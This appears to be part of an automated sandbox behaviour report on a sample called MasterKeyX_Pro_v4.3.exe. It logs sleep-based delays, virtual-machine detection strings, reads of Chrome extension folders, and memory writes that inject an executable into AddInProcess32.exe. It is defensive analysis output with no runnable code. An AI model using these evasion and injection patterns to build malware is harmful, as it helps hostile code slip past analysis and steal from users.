Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -95778s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -95609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -95435s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -95328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -95218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -95109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -95000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -94890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -94781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -94671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe TID: 7328 Thread sleep time: -94562s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -20291418481080494s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -99851s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -99726s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -99607s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -99499s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -99387s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -99265s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -99156s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -99042s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98932s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98812s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98703s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98593s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98484s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98375s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98265s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98156s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -98046s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97937s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97828s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97718s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97605s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97484s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97374s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97260s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97140s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -97031s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -96914s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -96789s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -96671s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -96562s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -96452s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -96229s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -95878s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8040 Thread sleep time: -95734s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3168 Thread sleep time: -56000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8032 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8024 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3272 Thread sleep time: -90000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2196 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99891 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99779 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99672 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99562 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99453 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99344 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99234 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99125 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 99016 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 98906 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 98776 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 98623 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 98469 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 98354 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 98234 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 98122 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 98015 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97906 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97797 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97687 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97578 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97469 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97359 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97250 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97140 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 97031 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96922 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96812 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96703 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96594 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96484 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96375 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96265 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96156 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 96047 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 95937 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 95778 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 95609 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 95435 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 95328 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 95218 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 95109 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 95000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 94890 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 94781 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 94671 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Thread delayed: delay time: 94562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99851 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99726 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99607 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99499 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99387 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 99042 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98932 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98812 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98703 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98593 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98375 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98265 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98156 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 98046 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97937 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97828 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97718 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97605 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97484 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97374 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97260 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97140 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 97031 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96914 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96789 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96671 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96562 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96452 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 96229 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95878 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 95734 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe, 0000000A.00000002.2805376301.000040CC00B1C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware svga
Source: chrome.exe, 0000000A.00000002.2810515476.000040CC0100C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2643693462.0000000008230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 18292495#Microsoft Hyper-V
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2643693462.0000000008230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1234093728qemu
Source: chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=3058ce89-e845-417a-b886-7e0fcf00ea4f
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2643693462.0000000008230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2643693462.0000000008230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VirtualMachineDetector
Source: AddInProcess32.exe, 00000007.00000002.2909478059.0000000001251000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2806282733.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2806282733.00000000015D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmtools
Source: AddInProcess32.exe, 00000007.00000002.2909478059.0000000001216000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(/%
Source: AddInProcess32.exe, 00000008.00000002.2806282733.00000000015D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW*y#c
Source: AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2610073955.0000000000D82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2643693462.0000000008230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1474865605QEMU
Source: AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 77930674-vmware pointing device
Source: AddInProcess32.exe, 00000005.00000002.2686593730.0000000001010000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2627741539.0000000004754000.00000004.00000800.00020000.00000000.sdmp, MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2643693462.0000000008230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2708471643.00000000043D3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VirtualMachine
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00443AB0 LdrInitializeThunk, 8_2_00443AB0
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: MasterKeyX_Pro_v4.3.exe PID: 7296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 8096, type: MEMORYSTR
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 140000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 46C000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 4D8000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: B72008 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 140000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 141000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 159000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 15D000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 15F000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 160000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 161000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 2F4008 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 419000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41D000 Jump to behavior
